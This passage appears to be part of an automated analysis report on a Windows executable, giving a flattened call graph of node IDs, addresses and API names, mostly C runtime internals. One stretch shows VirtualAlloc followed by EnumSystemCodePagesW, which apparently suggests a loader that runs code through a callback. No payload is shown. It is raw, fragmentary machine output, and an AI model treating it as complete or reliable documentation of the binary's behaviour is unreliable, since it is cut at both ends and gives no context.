__NMSG_WRITE 55 API calls 6796->6799 6798 4039c7 __FF_MSGBANNER 55 API calls 6797->6798 6798->6796 6800 401679 6799->6800 6801 403112 _fast_error_exit 3 API calls 6800->6801 6802 401683 6801->6802 6802->6687 6804 4039c7 __FF_MSGBANNER 55 API calls 6803->6804 6805 403130 6804->6805 6806 403a24 __NMSG_WRITE 55 API calls 6805->6806 6807 403138 6806->6807 7880 4031e6 6807->7880 6811 40329c _doexit 55 API calls 6810->6811 6812 4033da 6811->6812 6812->6714 6814 40329c _doexit 55 API calls 6813->6814 6815 40315e 6814->6815 6815->6717 6857 406d2b 6816->6857 6818 40320b __init_pointers __initp_misc_winsig 6858 40614b EncodePointer 6818->6858 6820 403223 __init_pointers 6821 403e53 34 API calls 6820->6821 6821->6721 6823 4044f3 6822->6823 6825 403055 6823->6825 6859 403de5 6823->6859 6825->6724 6835 403d67 6825->6835 6827 4030cb 6826->6827 6829 4030d1 6826->6829 6862 403d85 6827->6862 6830 404400 DeleteCriticalSection 6829->6830 6831 40441c 6829->6831 6865 404535 6830->6865 6833 404428 DeleteCriticalSection 6831->6833 6834 40305e 6831->6834 6833->6831 6834->6690 6836 40306b 6835->6836 6837 403d7e TlsAlloc 6835->6837 6836->6724 6836->6729 6840 404574 6838->6840 6841 403083 6840->6841 6842 404592 6840->6842 6891 408120 6840->6891 6841->6732 6844 403dc3 6841->6844 6842->6840 6842->6841 6898 4040ec Sleep 6842->6898 6845 403ddd TlsSetValue 6844->6845 6846 403dd9 6844->6846 6845->6735 6846->6735 6848 402fa4 __wfsopen 6847->6848 6899 4043b6 6848->6899 6850 402fe1 6906 403039 6850->6906 6853 4043b6 __lock 55 API calls 6854 403002 ___addlocaleref 6853->6854 6909 403042 6854->6909 6856 40302d __wfsopen 6856->6739 6857->6818 6858->6820 6860 403e02 InitializeCriticalSectionAndSpinCount 6859->6860 6861 403df5 6859->6861 6860->6823 6861->6823 6863 403d98 6862->6863 6864 403d9c TlsFree 6862->6864 6863->6829 6864->6829 6866 40453e HeapFree 6865->6866 6870 404567 __dosmaperr 6865->6870 6867 404553 6866->6867 6866->6870 6871 4024c9 6867->6871 6870->6829 6874 402f29 GetLastError 6871->6874 6873 4024ce GetLastError 6873->6870 6888 403da4 6874->6888 6876 402f3e 6877 402f8c SetLastError 6876->6877 6878 40456d __calloc_crt 52 API calls 6876->6878 6877->6873 6879 402f51 6878->6879 6879->6877 6880 403dc3 __getptd_noexit TlsSetValue 6879->6880 6881 402f65 6880->6881 6882 402f83 6881->6882 6883 402f6b 6881->6883 6884 404535 _free 52 API calls 6882->6884 6885 402f98 __initptd 52 API calls 6883->6885 6886 402f89 6884->6886 6887 402f73 GetCurrentThreadId 6885->6887 6886->6877 6887->6877 6889 403db7 6888->6889 6890 403dbb TlsGetValue 6888->6890 6889->6876 6890->6876 6892 40812b 6891->6892 6896 408146 _malloc 6891->6896 6893 408137 6892->6893 6892->6896 6895 4024c9 __wfsopen 54 API calls 6893->6895 6894 408156 HeapAlloc 6894->6896 6897 40813c 6894->6897 6895->6897 6896->6894 6896->6897 6897->6840 6898->6842 6900 4043c7 6899->6900 6901 4043da EnterCriticalSection 6899->6901 6912 40443e 6900->6912 6901->6850 6903 4043cd 6903->6901 6904 403128 __lock 54 API calls 6903->6904 6905 4043d9 6904->6905 6905->6901 7101 404520 LeaveCriticalSection 6906->7101 6908 402ffb 6908->6853 7102 404520 LeaveCriticalSection 6909->7102 6911 403049 6911->6856 6913 40444a __wfsopen 6912->6913 6914 404453 6913->6914 6915 40446b 6913->6915 6936 4039c7 6914->6936 6921 40448c __wfsopen 6915->6921 6978 4045b5 6915->6978 6921->6903 6923 404496 6925 4043b6 __lock 55 API calls 6923->6925 6924 404487 6927 4024c9 __wfsopen 55 API calls 6924->6927 6928 40449d 6925->6928 6927->6921 6930 4044c2 6928->6930 6931 4044aa 6928->6931 6933 404535 _free 55 API calls 6930->6933 6932 403de5 __getstream InitializeCriticalSectionAndSpinCount 6931->6932 6934 4044b6 6932->6934 6933->6934 6984 4044de 6934->6984 6987 403bee 6936->6987 6938 4039ce 6939 403bee __NMSG_WRITE 55 API calls 6938->6939 6941 4039db 6938->6941 6939->6941 6940 403a24 __NMSG_WRITE 55 API calls 6942 4039f3 6940->6942 6941->6940 6943 4039fd 6941->6943 6944 403a24 __NMSG_WRITE 55 API calls 6942->6944 6945 403a24 6943->6945 6944->6943 6946 403a42 __NMSG_WRITE 6945->6946 6948 403bee __NMSG_WRITE 52 API calls 6946->6948 6974 403b69 6946->6974 6950 403a55 6948->6950 6949 403bd2 6975 403112 6949->6975 6951 403b6e GetStdHandle 6950->6951 6952 403bee __NMSG_WRITE 52 API calls 6950->6952 6955 403b7c _strlen 6951->6955 6951->6974 6953 403a66 6952->6953 6953->6951 6954 403a78 6953->6954 6954->6974 7017 406f70 6954->7017 6958 403bb5 WriteFile 6955->6958 6955->6974 6958->6974 6959 403aa5 GetModuleFileNameW 6961 403ac5 6959->6961 6968 403ad5 __NMSG_WRITE 6959->6968 6960 403bd6 6962 4017fe __invoke_watson 8 API calls 6960->6962 6963 406f70 __NMSG_WRITE 52 API calls 6961->6963 6964 403be0 6962->6964 6963->6968 6965 403b1b 6965->6960 7035 40707b 6965->7035 6968->6960 6968->6965 7026 4070e7 6968->7026 6970 40707b __NMSG_WRITE 52 API calls 6971 403b52 6970->6971 6971->6960 6972 403b59 6971->6972 7044 4071a5 EncodePointer 6972->7044 7067 40412d 6974->7067 7082 4030de GetModuleHandleExW 6975->7082 6980 4045c3 6978->6980 6981 404480 6980->6981 6983 4045d6 6980->6983 7085 407fe3 6980->7085 6981->6923 6981->6924 6983->6980 6983->6981 7099 4040ec Sleep 6983->7099 7100 404520 LeaveCriticalSection 6984->7100 6986 4044e5 6986->6921 6988 403bf8 6987->6988 6989 403c02 6988->6989 6990 4024c9 __wfsopen 55 API calls 6988->6990 6989->6938 6991 403c1e 6990->6991 6994 4017ee 6991->6994 6997 4017c3 6994->6997 6998 4017d2 6997->6998 7003 4017fe IsProcessorFeaturePresent 6998->7003 7001 4017c3 __wfsopen 8 API calls 7002 4017fa 7001->7002 7002->6938 7004 401809 7003->7004 7009 401691 7004->7009 7008 4017ed 7008->7001 7010 4016ab _memset __call_reportfault 7009->7010 7011 4016cb IsDebuggerPresent 7010->7011 7012 40410f __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter 7011->7012 7014 40178f __call_reportfault 7012->7014 7013 40412d __cftof_l 6 API calls 7015 4017b2 7013->7015 7014->7013 7016 4040fa GetCurrentProcess TerminateProcess 7015->7016 7016->7008 7018 406f7b 7017->7018 7020 406f89 7017->7020 7018->7020 7022 406fa2 7018->7022 7019 4024c9 __wfsopen 55 API calls 7021 406f93 7019->7021 7020->7019 7023 4017ee __wfsopen 8 API calls 7021->7023 7024 403a98 7022->7024 7025 4024c9 __wfsopen 55 API calls 7022->7025 7023->7024 7024->6959 7024->6960 7025->7021 7030 4070f5 7026->7030 7027 4070f9 7028 4024c9 __wfsopen 55 API calls 7027->7028 7029 4070fe 7027->7029 7031 407129 7028->7031 7029->6965 7030->7027 7030->7029 7033 407138 7030->7033 7032 4017ee __wfsopen 8 API calls 7031->7032 7032->7029 7033->7029 7034 4024c9 __wfsopen 55 API calls 7033->7034 7034->7031 7037 407095 7035->7037 7038 407087 7035->7038 7036 4024c9 __wfsopen 55 API calls 7039 40709f 7036->7039 7037->7036 7038->7037 7042 4070c1 7038->7042 7040 4017ee __wfsopen 8 API calls 7039->7040 7041 403b3b 7040->7041 7041->6960 7041->6970 7042->7041 7043 4024c9 __wfsopen 55 API calls 7042->7043 7043->7039 7045 4071d9 ___crtIsPackagedApp 7044->7045 7046 407298 IsDebuggerPresent 7045->7046 7047 4071e8 LoadLibraryExW 7045->7047 7048 4072a2 7046->7048 7055 4072b0 7046->7055 7049 407225 GetProcAddress 7047->7049 7050 4071ff GetLastError 7047->7050 7051 4072a9 OutputDebugStringW 7048->7051 7048->7055 7052 4072b5 7049->7052 7054 407239 7 API calls 7049->7054 7050->7052 7053 40720e LoadLibraryExW 7050->7053 7051->7055 7058 40412d __cftof_l 6 API calls 7052->7058 7053->7049 7053->7052 7056 407281 GetProcAddress EncodePointer 7054->7056 7057 407295 7054->7057 7055->7052 7061 4072e9 DecodePointer DecodePointer 7055->7061 7065 407301 7055->7065 7056->7057 7057->7046 7063 407387 7058->7063 7059 407339 DecodePointer 7060 407325 DecodePointer 7059->7060 7064 407340 7059->7064 7060->7052 7061->7065 7063->6974 7064->7060 7066 407351 DecodePointer 7064->7066 7065->7059 7065->7060 7066->7060 7068 404135 7067->7068 7069 404137 IsProcessorFeaturePresent 7067->7069 7068->6949 7071 4073dc 7069->7071 7074 40738b IsDebuggerPresent 7071->7074 7075 4073a0 __call_reportfault 7074->7075 7080 40410f SetUnhandledExceptionFilter UnhandledExceptionFilter 7075->7080 7077 4073a8 __call_reportfault 7081 4040fa GetCurrentProcess TerminateProcess 7077->7081 7079 4073c5 7079->6949 7080->7077 7081->7079 7083 4030f7 GetProcAddress 7082->7083 7084 403109 ExitProcess 7082->7084 7083->7084 7086 40805e _malloc 7085->7086 7094 407fef _malloc 7085->7094 7089 4024c9 __wfsopen 54 API calls 7086->7089 7087 407ffa 7088 4039c7 __FF_MSGBANNER 54 API calls 7087->7088 7092 403a24 __NMSG_WRITE 54 API calls 7087->7092 7087->7094 7096 403112 _fast_error_exit 3 API calls 7087->7096 7088->7087 7090 408056 7089->7090 7090->6980 7091 408022 RtlAllocateHeap 7091->7090 7091->7094 7092->7087 7093 40804a 7095 4024c9 __wfsopen 54 API calls 7093->7095 7094->7087 7094->7091 7094->7093 7097 408048 7094->7097 7095->7097 7096->7087 7098 4024c9 __wfsopen 54 API calls 7097->7098 7098->7090 7099->6983 7100->6986 7101->6908 7102->6911 7106 404520 LeaveCriticalSection 7103->7106 7105 4036a6 7105->6745 7106->7105 7108 406ce9 RtlEncodePointer 7107->7108 7108->7108 7109 406d03 7108->7109 7109->6786 7113 406bd5 7110->7113 7112 406cdc 7112->6788 7114 406be1 __wfsopen 7113->7114 7121 40328a 7114->7121 7120 406c08 __wfsopen 7120->7112 7122 4043b6 __lock 55 API calls 7121->7122 7123 403291 7122->7123 7124 406c19 DecodePointer DecodePointer 7123->7124 7125 406c46 7124->7125 7126 406bf6 7124->7126 7125->7126 7138 408f85 7125->7138 7135 406c13 7126->7135 7128 406ca9 EncodePointer EncodePointer 7128->7126 7129 406c7d 7129->7126 7132 4045fc __realloc_crt 58 API calls 7129->7132 7134 406c97 EncodePointer 7129->7134 7130 406c58 7130->7128 7130->7129 7145 4045fc 7130->7145 7133 406c91 7132->7133 7133->7126 7133->7134 7134->7128 7169 403293 7135->7169 7139 408fa3 HeapSize 7138->7139 7140 408f8e 7138->7140 7139->7130 7141 4024c9 __wfsopen 55 API calls 7140->7141 7142 408f93 7141->7142 7143 4017ee __wfsopen 8 API calls 7142->7143 7144 408f9e 7143->7144 7144->7130 7149 404603 7145->7149 7147 404640 7147->7129 7149->7147 7150 408075 7149->7150 7168 4040ec Sleep 7149->7168 7151 408089 7150->7151 7152 40807e 7150->7152 7153 408091 7151->7153 7160 40809e _malloc 7151->7160 7154 407fe3 _malloc 55 API calls 7152->7154 7155 404535 _free 55 API calls 7153->7155 7156 408086 7154->7156 7167 408099 __dosmaperr 7155->7167 7156->7149 7157 4080d6 _malloc 7161 4024c9 __wfsopen 55 API calls 7157->7161 7158 4080a6 HeapReAlloc 7158->7160 7158->7167 7159 408106 7162 4024c9 __wfsopen 55 API calls 7159->7162 7160->7157 7160->7158 7160->7159 7164 4080ee 7160->7164 7161->7167 7163 40810b GetLastError 7162->7163 7163->7167 7165 4024c9 __wfsopen 55 API calls 7164->7165 7166 4080f3 GetLastError 7165->7166 7166->7167 7167->7149 7168->7149 7172 404520 LeaveCriticalSection 7169->7172 7171 40329a 7171->7120 7172->7171 7179 401442 7173->7179 7175 401026 VirtualAlloc 7176 401381 7175->7176 7695 40139c 7176->7695 7178 40104e EnumSystemCodePagesW 7178->6713 7182 40144e __wfsopen 7179->7182 7180 401461 7181 4024c9 __wfsopen 55 API calls 7180->7181 7183 401466 7181->7183 7182->7180 7184 401492 7182->7184 7185 4017ee __wfsopen 8 API calls 7183->7185 7198 402714 7184->7198 7195 401471 __wfsopen @_EH4_CallFilterFunc@8 7185->7195 7187 401497 7188 4014a0 7187->7188 7189 4014ad 7187->7189 7190 4024c9 __wfsopen 55 API calls 7188->7190 7191 4014d7 7189->7191 7192 4014b7 7189->7192 7190->7195 7213 402833 7191->7213 7193 4024c9 __wfsopen 55 API calls 7192->7193 7193->7195 7195->7175 7199 402720 __wfsopen 7198->7199 7200 4043b6 __lock 55 API calls 7199->7200 7209 40272e 7200->7209 7201 4027a9 7203 4045b5 __malloc_crt 55 API calls 7201->7203 7205 4027b0 7203->7205 7204 40281f __wfsopen 7204->7187 7208 403de5 __getstream InitializeCriticalSectionAndSpinCount 7205->7208 7211 4027a2 7205->7211 7206 40443e __mtinitlocknum 55 API calls 7206->7209 7210 4027d6 EnterCriticalSection 7208->7210 7209->7201 7209->7206 7209->7211 7234 401a47 7209->7234 7239 401ab1 7209->7239 7210->7211 7231 40282a 7211->7231 7214 402853 __wopenfile 7213->7214 7215 40286d 7214->7215 7227 402a28 7214->7227 7249 405e31 7214->7249 7216 4024c9 __wfsopen 55 API calls 7215->7216 7217 402872 7216->7217 7218 4017ee __wfsopen 8 API calls 7217->7218 7220 4014e2 7218->7220 7219 402a8b 7246 405d55 7219->7246 7228 401504 7220->7228 7224 405e31 __wcsnicmp 57 API calls 7225 402a40 7224->7225 7226 405e31 __wcsnicmp 57 API calls 7225->7226 7225->7227 7226->7227 7227->7215 7227->7219 7688 401a77 7228->7688 7230 40150a 7230->7195 7244 404520 LeaveCriticalSection 7231->7244 7233 402831 7233->7204 7235 401a52 7234->7235 7236 401a68 EnterCriticalSection 7234->7236 7237 4043b6 __lock 55 API calls 7235->7237 7236->7209 7238 401a5b 7237->7238 7238->7209 7240 401ad2 LeaveCriticalSection 7239->7240 7241 401abf 7239->7241 7240->7209 7245 404520 LeaveCriticalSection 7241->7245 7243 401acf 7243->7209 7244->7233 7245->7243 7257 405539 7246->7257 7248 405d6e 7248->7220 7250 405e43 7249->7250 7251 405ecf 7249->7251 7253 4024c9 __wfsopen 55 API calls 7250->7253 7254 402a21 7250->7254 7600 405ee7 7251->7600 7255 405e5c 7253->7255 7254->7224 7254->7227 7256 4017ee __wfsopen 8 API calls 7255->7256 7256->7254 7259 405545 __wfsopen 7257->7259 7258 40555b 7260 4024c9 __wfsopen 55 API calls 7258->7260 7259->7258 7262 405591 7259->7262 7261 405560 7260->7261 7263 4017ee __wfsopen 8 API calls 7261->7263 7268 405602 7262->7268 7267 40556a __wfsopen 7263->7267 7265 4055ad 7342 4055d6 7265->7342 7267->7248 7269 405622 7268->7269 7346 4084c5 7269->7346 7271 4017fe __invoke_watson 8 API calls 7272 405d54 7271->7272 7274 405539 __wsopen_helper 100 API calls 7272->7274 7273 40563e 7275 405678 7273->7275 7282 40569b 7273->7282 7290 405775 7273->7290 7277 405d6e 7274->7277 7377 402495 7275->7377 7277->7265 7279 4024c9 __wfsopen 55 API calls 7280 40568a 7279->7280 7283 4017ee __wfsopen 8 API calls 7280->7283 7281 405759 7284 402495 __read_nolock 55 API calls 7281->7284 7282->7281 7289 405737 7282->7289 7309 405694 7283->7309 7285 40575e 7284->7285 7286 4024c9 __wfsopen 55 API calls 7285->7286 7287 40576b 7286->7287 7288 4017ee __wfsopen 8 API calls 7287->7288 7288->7290 7353 404fb7 7289->7353 7290->7271 7292 405805 7293 405832 7292->7293 7294 40580f 7292->7294 7371 4054b1 7293->7371 7296 402495 __read_nolock 55 API calls 7294->7296 7297 405814 7296->7297 7298 4024c9 __wfsopen 55 API calls 7297->7298 7300 40581e 7298->7300 7299 4058d2 GetFileType 7301 4058dd GetLastError 7299->7301 7302 40591f 7299->7302 7304 4024c9 __wfsopen 55 API calls 7300->7304 7305 4024a8 __dosmaperr 55 API calls 7301->7305 7385 40524d 7302->7385 7303 4058a0 GetLastError 7380 4024a8 7303->7380 7304->7309 7310 405904 CloseHandle 7305->7310 7308 4058c5 7315 4024c9 __wfsopen 55 API calls 7308->7315 7309->7265 7310->7308 7313 405912 7310->7313 7311 4054b1 ___createFile 3 API calls 7314 405895 7311->7314 7316 4024c9 __wfsopen 55 API calls 7313->7316 7314->7299 7314->7303 7315->7290 7317 405917 7316->7317 7317->7308 7318 405af8 7318->7290 7321 405ccb CloseHandle 7318->7321 7323 4054b1 ___createFile 3 API calls 7321->7323 7324 405cf2 7323->7324 7327 405cfa GetLastError 7324->7327 7328 405b82 7324->7328 7325 402495 __read_nolock 55 API calls 7339 4059be 7325->7339 7326 401d04 67 API calls __read_nolock 7326->7339 7329 4024a8 __dosmaperr 55 API calls 7327->7329 7328->7290 7331 405d06 7329->7331 7330 4059c6 7330->7339 7403 40842b 7330->7403 7418 40819a 7330->7418 7477 405160 7331->7477 7336 405b75 7338 40842b __close_nolock 58 API calls 7336->7338 7337 4052f5 57 API calls __lseeki64_nolock 7337->7339 7340 405b7c 7338->7340 7339->7318 7339->7326 7339->7330 7339->7336 7339->7337 7449 40768f 7339->7449 7341 4024c9 __wfsopen 55 API calls 7340->7341 7341->7328 7343 405600 7342->7343 7344 4055dc 7342->7344 7343->7267 7599 4052cf LeaveCriticalSection 7344->7599 7347 4084e4 7346->7347 7348 4084cf 7346->7348 7347->7273 7349 4024c9 __wfsopen 55 API calls 7348->7349 7350 4084d4 7349->7350 7351 4017ee __wfsopen 8 API calls 7350->7351 7352 4084df 7351->7352 7352->7273 7354 404fc3 __wfsopen 7353->7354 7355 40443e __mtinitlocknum 55 API calls 7354->7355 7356 404fd4 7355->7356 7357 4043b6 __lock 55 API calls 7356->7357 7358 404fd9 __wfsopen 7356->7358 7361 404fe7 7357->7361 7358->7292 7360 4050c7 7362 40456d __calloc_crt 55 API calls 7360->7362 7361->7360 7364 405067 EnterCriticalSection 7361->7364 7365 4043b6 __lock 55 API calls 7361->7365 7368 405135 7361->7368 7369 403de5 __getstream InitializeCriticalSectionAndSpinCount 7361->7369 7486 40508f 7361->7486 7363 4050d0 7362->7363 7363->7368 7489 404f29 7363->7489 7364->7361 7366 405077 LeaveCriticalSection 7364->7366 7365->7361 7366->7361 7498 405157 7368->7498 7369->7361 7372 4054bc ___crtIsPackagedApp 7371->7372 7373 4054c0 GetModuleHandleW GetProcAddress 7372->7373 7374 405517 CreateFileW 7372->7374 7376 4054dd 7373->7376 7375 405535 7374->7375 7375->7299 7375->7303 7375->7311 7376->7375 7378 402f29 __getptd_noexit 55 API calls 7377->7378 7379 40249a 7378->7379 7379->7279 7381 402495 __read_nolock 55 API calls 7380->7381 7382 4024b1 __dosmaperr 7381->7382 7383 4024c9 __wfsopen 55 API calls 7382->7383 7384 4024c4 7383->7384 7384->7308 7386 4052b5 7385->7386 7387 405259 7385->7387 7388 4024c9 __wfsopen 55 API calls 7386->7388 7387->7386 7389 40527b 7387->7389 7390 4052ba 7388->7390 7391 4052a6 7389->7391 7393 4052a0 SetStdHandle 7389->7393 7392 402495 __read_nolock 55 API calls 7390->7392 7391->7318 7391->7339 7394 4052f5 7391->7394 7392->7391 7393->7391 7506 4051e6 7394->7506 7396 405305 7397 40530d 7396->7397 7398 40531e SetFilePointerEx 7396->7398 7399 4024c9 __wfsopen 55 API calls 7397->7399 7400 405336 GetLastError 7398->7400 7401 405312 7398->7401 7399->7401 7402 4024a8 __dosmaperr 55 API calls 7400->7402 7401->7325 7401->7339 7402->7401 7404 4051e6 __close_nolock 55 API calls 7403->7404 7406 408439 7404->7406 7405 40848f 7407 405160 __free_osfhnd 56 API calls 7405->7407 7406->7405 7409 4051e6 __close_nolock 55 API calls 7406->7409 7417 40846d 7406->7417 7408 408497 7407->7408 7411 4084b9 7408->7411 7414 4024a8 __dosmaperr 55 API calls 7408->7414 7412 408464 7409->7412 7410 4051e6 __close_nolock 55 API calls 7413 408479 CloseHandle 7410->7413 7411->7330 7415 4051e6 __close_nolock 55 API calls 7412->7415 7413->7405 7416 408485 GetLastError 7413->7416 7414->7411 7415->7417 7416->7405 7417->7405 7417->7410 7419 4052f5 __lseeki64_nolock 57 API calls 7418->7419 7420 4081b7 7419->7420 7422 4052f5 __lseeki64_nolock 57 API calls 7420->7422 7432 40821c 7420->7432 7421 4024c9 __wfsopen 55 API calls 7423 408227 7421->7423 7425 4081d3 7422->7425 7423->7330 7424 4082bb 7427 408321 7424->7427 7430 4052f5 __lseeki64_nolock 57 API calls 7424->7430 7425->7424 7426 4081fc GetProcessHeap HeapAlloc 7425->7426 7425->7432 7428 408217 7426->7428 7439 408230 __setmode_nolock 7426->7439 7429 4052f5 __lseeki64_nolock 57 API calls 7427->7429 7427->7432 7431 4024c9 __wfsopen 55 API calls 7428->7431 7429->7432 7433 4082d3 7430->7433 7431->7432 7432->7421 7432->7423 7433->7432 7434 4051e6 __close_nolock 55 API calls 7433->7434 7435 4082e7 SetEndOfFile 7434->7435 7435->7427 7436 408307 7435->7436 7438 4024c9 __wfsopen 55 API calls 7436->7438 7440 40830c 7438->7440 7441 408281 7439->7441 7444 408290 __setmode_nolock 7439->7444 7519 40777e 7439->7519 7443 402495 __read_nolock 55 API calls 7440->7443 7442 402495 __read_nolock 55 API calls 7441->7442 7445 408286 7442->7445 7446 408317 GetLastError 7443->7446 7447 4082a5 GetProcessHeap HeapFree 7444->7447 7445->7444 7448 4024c9 __wfsopen 55 API calls 7445->7448 7446->7427 7447->7427 7448->7444 7450 40769b __wfsopen 7449->7450 7451 4076a8 7450->7451 7452 4076bf 7450->7452 7453 402495 __read_nolock 55 API calls 7451->7453 7454 40775e 7452->7454 7457 4076d3 7452->7457 7456 4076ad 7453->7456 7455 402495 __read_nolock 55 API calls 7454->7455 7458 4076f6 7455->7458 7459 4024c9 __wfsopen 55 API calls 7456->7459 7460 4076f1 7457->7460 7461 4076fb 7457->7461 7464 4024c9 __wfsopen 55 API calls 7458->7464 7472 4076b4 __wfsopen 7459->7472 7463 402495 __read_nolock 55 API calls 7460->7463 7462 404f29 ___lock_fhandle 56 API calls 7461->7462 7465 407701 7462->7465 7463->7458 7466 40776a 7464->7466 7467 407714 7465->7467 7468 407727 7465->7468 7469 4017ee __wfsopen 8 API calls 7466->7469 7470 40777e __write_nolock 73 API calls 7467->7470 7471 4024c9 __wfsopen 55 API calls 7468->7471 7469->7472 7473 407720 7470->7473 7474 40772c 7471->7474 7472->7339 7595 407756 7473->7595 7475 402495 __read_nolock 55 API calls 7474->7475 7475->7473 7478 4051cc 7477->7478 7479 40516c 7477->7479 7480 4024c9 __wfsopen 55 API calls 7478->7480 7479->7478 7485 405195 7479->7485 7481 4051d1 7480->7481 7482 402495 __read_nolock 55 API calls 7481->7482 7483 4051bd 7482->7483 7483->7328 7484 4051b7 SetStdHandle 7484->7483 7485->7483 7485->7484 7501 404520 LeaveCriticalSection 7486->7501 7488 405096 7488->7361 7490 404f35 __wfsopen 7489->7490 7491 404f84 EnterCriticalSection 7490->7491 7493 4043b6 __lock 55 API calls 7490->7493 7492 404faa __wfsopen 7491->7492 7492->7368 7494 404f5a 7493->7494 7495 404f72 7494->7495 7496 403de5 __getstream InitializeCriticalSectionAndSpinCount 7494->7496 7502 404fae 7495->7502 7496->7495 7505 404520 LeaveCriticalSection 7498->7505 7500 40515e 7500->7358 7501->7488 7503 404520 _doexit LeaveCriticalSection 7502->7503 7504 404fb5 7503->7504 7504->7491 7505->7500 7507 4051f1 7506->7507 7508 405206 7506->7508 7509 402495 __read_nolock 55 API calls 7507->7509 7511 402495 __read_nolock 55 API calls 7508->7511 7513 40522b 7508->7513 7510 4051f6 7509->7510 7512 4024c9 __wfsopen 55 API calls 7510->7512 7514 405235 7511->7514 7515 4051fe 7512->7515 7513->7396 7516 4024c9 __wfsopen 55 API calls 7514->7516 7515->7396 7517 40523d 7516->7517 7518 4017ee __wfsopen 8 API calls 7517->7518 7518->7515 7520 40778b __write_nolock 7519->7520 7521 4077bf 7520->7521 7522 4077e9 7520->7522 7523 4077ca 7520->7523 7524 40412d __cftof_l 6 API calls 7521->7524 7528 407841 7522->7528 7529 407825 7522->7529 7525 402495 __read_nolock 55 API calls 7523->7525 7526 407fdf 7524->7526 7527 4077cf 7525->7527 7526->7439 7530 4024c9 __wfsopen 55 API calls 7527->7530 7531 40785a 7528->7531 7534 4052f5 __lseeki64_nolock 57 API calls 7528->7534 7532 402495 __read_nolock 55 API calls 7529->7532 7533 4077d6 7530->7533 7578 404ed5 7531->7578 7536 40782a 7532->7536 7538 4017ee __wfsopen 8 API calls 7533->7538 7534->7531 7537 4024c9 __wfsopen 55 API calls 7536->7537 7539 407831 7537->7539 7538->7521 7541 4017ee __wfsopen 8 API calls 7539->7541 7540 407bc1 7543 407f54 WriteFile 7540->7543 7544 407bdf 7540->7544 7541->7521 7542 407868 7542->7540 7587 402f11 7542->7587 7545 407bb4 GetLastError 7543->7545 7555 407b81 7543->7555 7546 407d03 7544->7546 7552 407bf5 7544->7552 7545->7555 7556 407d0e 7546->7556 7570 407df8 7546->7570 7548 407f8d 7548->7521 7554 4024c9 __wfsopen 55 API calls 7548->7554 7550 4078d3 7550->7540 7551 4078e3 GetConsoleCP 7550->7551 7551->7548 7576 407912 7551->7576 7552->7548 7553 407c64 WriteFile 7552->7553 7552->7555 7553->7545 7553->7552 7557 407fbb 7554->7557 7555->7521 7555->7548 7558 407ce1 7555->7558 7556->7548 7556->7555 7560 407d73 WriteFile 7556->7560 7561 402495 __read_nolock 55 API calls 7557->7561 7562 407f84 7558->7562 7563 407cec 7558->7563 7559 407e6d WideCharToMultiByte 7559->7545 7559->7570 7560->7545 7560->7556 7561->7521 7564 4024a8 __dosmaperr 55 API calls 7562->7564 7565 4024c9 __wfsopen 55 API calls 7563->7565 7564->7521 7566 407cf1 7565->7566 7568 402495 __read_nolock 55 API calls 7566->7568 7567 407ebc WriteFile 7567->7570 7571 407f0f GetLastError 7567->7571 7568->7521 7570->7548 7570->7555 7570->7559 7570->7567 7571->7570 7572 409261 57 API calls __write_nolock 7572->7576 7573 409279 WriteConsoleW CreateFileW __putwch_nolock 7573->7576 7574 4079fb WideCharToMultiByte 7574->7555 7575 407a36 WriteFile 7574->7575 7575->7545 7575->7576 7576->7545 7576->7555 7576->7572 7576->7573 7576->7574 7577 407a90 WriteFile 7576->7577 7592 40915b 7576->7592 7577->7545 7577->7576 7579 404ee0 7578->7579 7580 404eed 7578->7580 7581 4024c9 __wfsopen 55 API calls 7579->7581 7582 404ef9 7580->7582 7583 4024c9 __wfsopen 55 API calls 7580->7583 7584 404ee5 7581->7584 7582->7542 7585 404f1a 7583->7585 7584->7542 7586 4017ee __wfsopen 8 API calls 7585->7586 7586->7584 7588 402f29 __getptd_noexit 55 API calls 7587->7588 7589 402f17 7588->7589 7590 402f24 GetConsoleMode 7589->7590 7591 403128 __lock 55 API calls 7589->7591 7590->7540 7590->7550 7591->7590 7593 409121 __isleadbyte_l 55 API calls 7592->7593 7594 409168 7593->7594 7594->7576 7598 4052cf LeaveCriticalSection 7595->7598 7597 40775c 7597->7472 7598->7597 7599->7343 7601 405efb 7600->7601 7608 405f12 7600->7608 7602 405f02 7601->7602 7604 405f23 7601->7604 7603 4024c9 __wfsopen 55 API calls 7602->7603 7605 405f07 7603->7605 7611 405da9 7604->7611 7607 4017ee __wfsopen 8 API calls 7605->7607 7607->7608 7608->7254 7609 4085bc 57 API calls __towlower_l 7610 405f2e 7609->7610 7610->7608 7610->7609 7612 405dba 7611->7612 7618 405e07 7611->7618 7613 402f11 __write_nolock 55 API calls 7612->7613 7614 405dc0 7613->7614 7615 405de7 7614->7615 7619 4063eb 7614->7619 7615->7618 7634 40676d 7615->7634 7618->7610 7620 4063f7 __wfsopen 7619->7620 7621 402f11 __write_nolock 55 API calls 7620->7621 7622 406400 7621->7622 7623 40642f 7622->7623 7625 406413 7622->7625 7624 4043b6 __lock 55 API calls 7623->7624 7626 406436 7624->7626 7627 402f11 __write_nolock 55 API calls 7625->7627 7646 40646b 7626->7646 7629 406418 7627->7629 7632 406426 __wfsopen 7629->7632 7633 403128 __lock 55 API calls 7629->7633 7632->7615 7633->7632 7635 406779 __wfsopen 7634->7635 7636 402f11 __write_nolock 55 API calls 7635->7636 7637 406783 7636->7637 7638 4043b6 __lock 55 API calls 7637->7638 7639 406795 7637->7639 7642 4067b3 7638->7642 7640 4067a3 __wfsopen 7639->7640 7644 403128 __lock 55 API calls 7639->7644 7640->7618 7641 4067e0 7684 40680a 7641->7684 7642->7641 7645 404535 _free 55 API calls 7642->7645 7644->7640 7645->7641 7647 406476 ___addlocaleref ___removelocaleref 7646->7647 7649 40644a 7646->7649 7647->7649 7653 4061f1 7647->7653 7650 406462 7649->7650 7683 404520 LeaveCriticalSection 7650->7683 7652 406469 7652->7629 7654 40626a 7653->7654 7661 406206 7653->7661 7655 404535 _free 55 API calls 7654->7655 7656 4062b7 7654->7656 7657 40628b 7655->7657 7658 408865 ___free_lc_time 55 API calls 7656->7658 7681 4062e0 7656->7681 7659 404535 _free 55 API calls 7657->7659 7660 4062d5 7658->7660 7663 40629e 7659->7663 7665 404535 _free 55 API calls 7660->7665 7661->7654 7666 404535 _free 55 API calls 7661->7666 7678 406237 7661->7678 7662 40633f 7668 404535 _free 55 API calls 7662->7668 7669 404535 _free 55 API calls 7663->7669 7664 404535 _free 55 API calls 7672 40625f 7664->7672 7665->7681 7667 40622c 7666->7667 7673 408702 ___freetlocinfo 55 API calls 7667->7673 7674 406345 7668->7674 7675 4062ac 7669->7675 7670 404535 55 